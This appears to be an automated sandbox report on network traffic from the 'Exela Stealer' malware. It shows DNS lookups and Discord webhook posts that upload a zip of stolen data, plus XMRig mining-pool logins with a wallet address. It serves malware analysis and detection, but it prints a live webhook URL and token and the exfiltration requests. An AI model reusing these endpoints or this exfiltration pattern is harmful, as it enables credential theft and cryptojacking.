                                                                                                  Jan 12, 2025 07:11:29.224181890 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233427048 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233628988 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233659983 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233683109 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233714104 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233717918 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233733892 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233753920 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233819008 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.238651991 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.091965914 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.092107058 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.092159986 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:30.093244076 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:30.093256950 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.581722975 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:30.581811905 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.581876993 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:30.582484961 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:30.582520008 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.209825039 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.210392952 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.210442066 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.211519957 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.211601973 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.212558985 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.212640047 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.212917089 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.212935925 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.389405966 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.455667019 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.455769062 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.455827951 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.456574917 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.456617117 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.509738922 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.576935053 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:11:31.901527882 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:31.901571989 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.901704073 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:31.902328968 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:31.902350903 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.544842005 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.545384884 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.545404911 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.546940088 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.547087908 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.548650980 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.548650980 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.548798084 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.548826933 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.549396992 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.549412966 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.549530029 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.549571037 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.550276041 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.550276041 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.550396919 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.719477892 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.719558001 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.719705105 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:34.720983028 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:34.721000910 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.723177910 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:34.723231077 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.723501921 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:34.723984003 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:34.724011898 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.195276022 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.195842981 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.195875883 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.196906090 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.196984053 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198105097 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198177099 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.198364019 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198453903 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198465109 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.358275890 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:36.748317003 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:36.748431921 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:36.748683929 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:36.750222921 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:36.750242949 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:47.779810905 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:11:47.826955080 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:12:01.105902910 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:12:01.155129910 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:12:09.462213993 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:12:09.514564037 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:12:31.513183117 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:12:31.561687946 CET49857443192.168.2.780.240.16.67
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 12, 2025 07:10:50.120904922 CET6223053192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:10:50.127825022 CET53622301.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:17.859173059 CET5935253192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:17.865780115 CET53593521.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.251852989 CET6234253192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:27.258626938 CET53623421.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.573817015 CET5847953192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:30.580466032 CET53584791.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.892726898 CET6256553192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:31.899880886 CET53625651.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2025 07:10:50.120904922 CET | 192.168.2.7 | 1.1.1.1 | 0x6c8d | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:17.859173059 CET | 192.168.2.7 | 1.1.1.1 | 0xd0c9 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:27.251852989 CET | 192.168.2.7 | 1.1.1.1 | 0x181e | Standard query (0) | discordapp.com | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:30.573817015 CET | 192.168.2.7 | 1.1.1.1 | 0x3f9f | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:31.892726898 CET | 192.168.2.7 | 1.1.1.1 | 0xc296 | Standard query (0) | store1.gofile.io | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2025 07:10:23.777848959 CET | 1.1.1.1 | 192.168.2.7 | 0x78f4 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 12, 2025 07:10:23.777848959 CET | 1.1.1.1 | 192.168.2.7 | 0x78f4 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:10:50.127825022 CET | 1.1.1.1 | 192.168.2.7 | 0x6c8d | No error (0) | pool.hashvault.pro | - | 192.248.189.11 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:10:50.127825022 CET | 1.1.1.1 | 192.168.2.7 | 0x6c8d | No error (0) | pool.hashvault.pro | - | 80.240.16.67 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:17.865780115 CET | 1.1.1.1 | 192.168.2.7 | 0xd0c9 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:27.258626938 CET | 1.1.1.1 | 192.168.2.7 | 0x181e | No error (0) | discordapp.com | - | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:27.258626938 CET | 1.1.1.1 | 192.168.2.7 | 0x181e | No error (0) | discordapp.com | - | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:27.258626938 CET | 1.1.1.1 | 192.168.2.7 | 0x181e | No error (0) | discordapp.com | - | 162.159.130.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:27.258626938 CET | 1.1.1.1 | 192.168.2.7 | 0x181e | No error (0) | discordapp.com | - | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:27.258626938 CET | 1.1.1.1 | 192.168.2.7 | 0x181e | No error (0) | discordapp.com | - | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:30.580466032 CET | 1.1.1.1 | 192.168.2.7 | 0x3f9f | No error (0) | api.gofile.io | - | 51.91.7.6 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:30.580466032 CET | 1.1.1.1 | 192.168.2.7 | 0x3f9f | No error (0) | api.gofile.io | - | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 07:11:31.899880886 CET | 1.1.1.1 | 192.168.2.7 | 0xc296 | No error (0) | store1.gofile.io | - | 45.112.123.227 | A (IP address) | IN (0x0001) | false
                                                                                                  • discordapp.com
                                                                                                  • api.gofile.io
                                                                                                  • store1.gofile.io
                                                                                                  • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49982 | 208.95.112.1 | 80 | 2980 | C:\Users\user\AppData\Local\Temp\Exela.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2025 07:11:17.874192953 CET | 126 | OUT | GET /json HTTP/1.1
Host: ip-api.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.10 aiohttp/3.11.11
Jan 12, 2025 07:11:18.338527918 CET | 482 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 06:11:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 306
Access-Control-Allow-Origin: *
X-Ttl: 7
X-Rl: 42
                                                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                  Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49857 | 80.240.16.67 | 443 | 4300 | C:\Windows\System32\conhost.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:10:50 UTC | 594 | OUT | Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47RPwBVJUDgRqN5uiXSUvdPq6zAVAjHC2jdgRnuSuKQyMfrJuFc4eFa3H9WfvbJcuBCcte7uBA1vacNgRT7ME1vx4XtJYqp","pass":"212","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid":"
2025-01-12 06:10:51 UTC | 732 | IN | Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"36a64297-088a-44d6-8db5-0031bdda949d","job":{"blob":"1010e7b98dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a0000000012b7224f29d29ffa8b63814766e64b9e5348aa638948af9716ce88fad15840f
2025-01-12 06:11:01 UTC | 471 | IN | Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e7b98dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a000000009a20a840963b7ded3c6ebffd31c75532c96f2f5bcd286d800f37228ed505940411","job_id":"3c5e3076-1c58-4295-9a4c-bac6a09a963f","ta
2025-01-12 06:11:09 UTC | 471 | IN | Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fdb98dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a000000001dc34e9644c42e8f12e4e270553b3e87117c8bbf034248668bcd3993e45ce89911","job_id":"3074b967-9106-4d33-99d1-4df73e1bad9a","ta
2025-01-12 06:11:31 UTC | 471 | IN | Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101093ba8dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a00000000202451fd8438a20bbfff0b79aedde2375bdc22e207c34ab21c2136d94f8d5fb114","job_id":"c9284edf-5863-4b64-bdb0-5a5f881c7d9b","ta
2025-01-12 06:11:47 UTC | 471 | IN | Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a3ba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda0000000006cd63ca8eb306ec678bd8ba9d9ab544d6460cfd308528445d4b418bb89a0593701","job_id":"13bd6c37-a4af-4a7c-ad9d-325b63ac75f4","ta
2025-01-12 06:12:01 UTC | 471 | IN | Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a3ba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda0000000004b659330868107555fe7174aca3e74eec40392cd9b58ca7bc2864d1b360a482901","job_id":"58ed87f2-a887-4e72-bca1-70e2ff046a31","ta
2025-01-12 06:12:09 UTC | 471 | IN | Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b9ba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda00000000079462966ca6078a8292f441fefd71712ec9ec9930522994d186e52f57e6a13fd08","job_id":"4824e798-5c48-4bdf-8712-ceaca79cf8ff","ta
2025-01-12 06:12:31 UTC | 471 | IN | Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cfba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda0000000006ede5b889f56092458ed84112c9262f77be2310542ea23e899842a6945b8617b0c","job_id":"21c741de-f02c-4d5e-81b9-7988594d0ce8","ta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49983 | 162.159.134.233 | 443 | 2980 | C:\Users\user\AppData\Local\Temp\Exela.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:11:27 UTC | 282 | OUT | POST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
    Host: discordapp.com
    Content-Type: application/json
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.10 aiohttp/3.11.11
    Content-Length: 1379
2025-01-12 06:11:27 UTC | 1379 | OUT | Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Exela Stealer Full Info***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0
2025-01-12 06:11:27 UTC | 1115 | IN | HTTP/1.1 204 No Content
    Date: Sun, 12 Jan 2025 06:11:27 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Set-Cookie: __dcfduid=0f26544ed0ac11ef80d5ba8b98d27b3f; Expires=Fri, 11-Jan-2030 06:11:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1736662289
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QEgndhUGprmHRlVRKMYQAFrJg%2FN6TftKm0AfqCuiliKm2NAbcuVDvdNlITGqkTA0Whx29uXMlW01uuaqT0l0yJ0ueVNEVonrUeh207qh%2BstSlvIVJO%2BSzcO8W%2FI8%2B6CJ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: __sdcfduid=0f26544ed0ac11ef80d5ba8b98d27b3fc5579229b5329e1871465a91b048bb8ca973bfaee3a736a7707de73121f03735; Expires=Fri, 11-Jan-2030 06:11:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2025-01-12 06:11:27 UTC | 626 | IN | Data Ascii: Set-Cookie: __cf_bm=kRe3h6kKuo2DPgTLbd_NANk.MBp9xeqzMc0IhXmJbSk-1736662287-1.0.1.1-QCqEftWaMiWPUWFq9jyTUSsXbWbVWuqfZ6ZMWc70ygIlPXxgQ6jp5_.OEYfuk.P3k09phrRB5vIK2GKn7oM5_g; path=/; expires=Sun, 12-Jan-25 06:41:27 GMT; domain=.discordapp.com; HttpOnly; Secur


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49984 | 162.159.134.233 | 443 | 2980 | C:\Users\user\AppData\Local\Temp\Exela.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:11:28 UTC | 281 | OUT | POST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
    Host: discordapp.com
    Content-Type: application/json
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.10 aiohttp/3.11.11
    Content-Length: 512
2025-01-12 06:11:28 UTC | 512 | OUT | Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Keyword Result***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thum
2025-01-12 06:11:28 UTC | 1107 | IN | HTTP/1.1 204 No Content
    Date: Sun, 12 Jan 2025 06:11:28 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Set-Cookie: __dcfduid=0f92e6ccd0ac11efb060f68100a105d3; Expires=Fri, 11-Jan-2030 06:11:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1736662289
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kOak84shaLqHRk56yPEJc9OjVYi7CFyI1ypGuMFtok%2Ft4Ds9EXjmVTiLwImtsOAxm6Dzh3OOkKDmoHV1zi5M1F3yh7oRgudJ8PZbk0RU4h6jethSpHlgLw28XNSMDFV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: __sdcfduid=0f92e6ccd0ac11efb060f68100a105d353bf0f8d18177f290ea103a396d165e4c89b0eade74b13bb9a4d4aa3f61b446f; Expires=Fri, 11-Jan-2030 06:11:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2025-01-12 06:11:28 UTC | 626 | IN | Data Ascii: Set-Cookie: __cf_bm=qLuhCp8b0JIS3tfVfBAqzEMNJhUx5gFuHaBB24cW5L8-1736662288-1.0.1.1-HHYh.Ex8gYf6pFbCs_A.SI_YZii_paiaF6ns5JGfphkNDVpKdPePdzuA_ytV4pAqwCElqjEF59wrVfTw3LYeQg; path=/; expires=Sun, 12-Jan-25 06:41:28 GMT; domain=.discordapp.com; HttpOnly; Secur


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49985 | 162.159.135.233 | 443 | 2980 | C:\Users\user\AppData\Local\Temp\Exela.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:11:29 UTC | 797 | OUT | POST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
    Host: discordapp.com
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Python/3.10 aiohttp/3.11.11
    Cookie: __cf_bm=kRe3h6kKuo2DPgTLbd_NANk.MBp9xeqzMc0IhXmJbSk-1736662287-1.0.1.1-QCqEftWaMiWPUWFq9jyTUSsXbWbVWuqfZ6ZMWc70ygIlPXxgQ6jp5_.OEYfuk.P3k09phrRB5vIK2GKn7oM5_g; __cfruid=845f3cb9bc9bbeee108c1c6130b8f83b27653c85-1736662287; __dcfduid=0f26544ed0ac11ef80d5ba8b98d27b3f; __sdcfduid=0f26544ed0ac11ef80d5ba8b98d27b3fc5579229b5329e1871465a91b048bb8ca973bfaee3a736a7707de73121f03735; _cfuvid=D_QK7z_jZ5INFLeHJv_tQnl7ZycekPUVTuCe7EpHR1U-1736662287908-0.0.1.1-604800000
    Content-Length: 672933
    Content-Type: multipart/form-data; boundary=2215b2dc4b7347aabe8dea1695f9bcc5
2025-01-12 06:11:29 UTC | 36 | OUT | Data Ascii: --2215b2dc4b7347aabe8dea1695f9bcc5
2025-01-12 06:11:29 UTC | 140 | OUT | Data Ascii: Content-Type: application/octet-stream
    Content-Disposition: form-data; name="file"; filename="19882742-CC56-1A59-9779-FB8CBFA1E29D.zip"
2025-01-12 06:11:29 UTC | 16384 | OUT | (binary chunk of the uploaded .zip file)
2025-01-12 06:11:29 UTC | 16384 | OUT | (binary chunk of the uploaded .zip file)
2025-01-12 06:11:29 UTC | 16384 | OUT | (binary chunk of the uploaded .zip file)
2025-01-12 06:11:29 UTC | 16384 | OUT | (binary chunk of the uploaded .zip file)
                                                                                                  Data Ascii: &p^v}X>z]}5aXSXzd3' :h 7j#m>c"ksPDi(&^3O@]s3Lz>{_:;&Y`4:%b*UL>9HB('<P"yG/|g;}23<fODH}'8m%
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: ad b2 e0 72 ac 57 6b 4a 84 57 d9 03 69 d2 52 25 67 5e 88 f6 54 65 38 6f 37 cd 0f ff 69 4b 12 d2 fb df c0 a4 52 9d d3 43 9c a7 d9 c1 d3 a8 2a 72 e2 62 ba 20 24 e6 e7 cd 2f 28 03 fe d8 01 c5 75 45 d9 01 52 d4 0f 14 d1 b7 1f bd 12 81 0b 42 4b 31 fb 22 ae e1 12 00 0f aa 14 b0 24 d5 cc 9a 72 a3 2a 72 49 91 f2 d6 a9 a1 ae ea 03 92 3b 63 be e9 e3 8b 5f 0d 68 fa ab 3e 23 c4 9d 93 ed 6e 87 bb f1 ec a5 e0 b6 89 73 33 36 b3 ea 16 fc 2a d7 81 5b c7 86 42 c2 c3 50 8d 0f 27 34 46 87 22 e7 d8 87 31 8a c5 54 58 bc ea ee 88 42 ca 5a d6 82 1d fd 42 4e 27 ba 78 59 ad ea 44 30 2f 6c 0e aa a9 2f c0 29 6f bd c5 af 76 8b 5c 28 ae 65 4d fe 26 05 75 d3 5c e9 2f d2 31 cb 2a fa aa cb 64 a0 7e ae 04 01 f1 4b 8b 34 cc b1 ce 11 fa 40 c5 85 a7 86 62 9a cc 17 cf 06 fb 9a b0 cc 87 94 d8
                                                                                                  Data Ascii: rWkJWiR%g^Te8o7iKRC*rb $/(uERBK1"$r*rI;c_h>#ns36*[BP'4F"1TXBZBN'xYD0/l/)ov\(eM&u\/1*d~K4@b
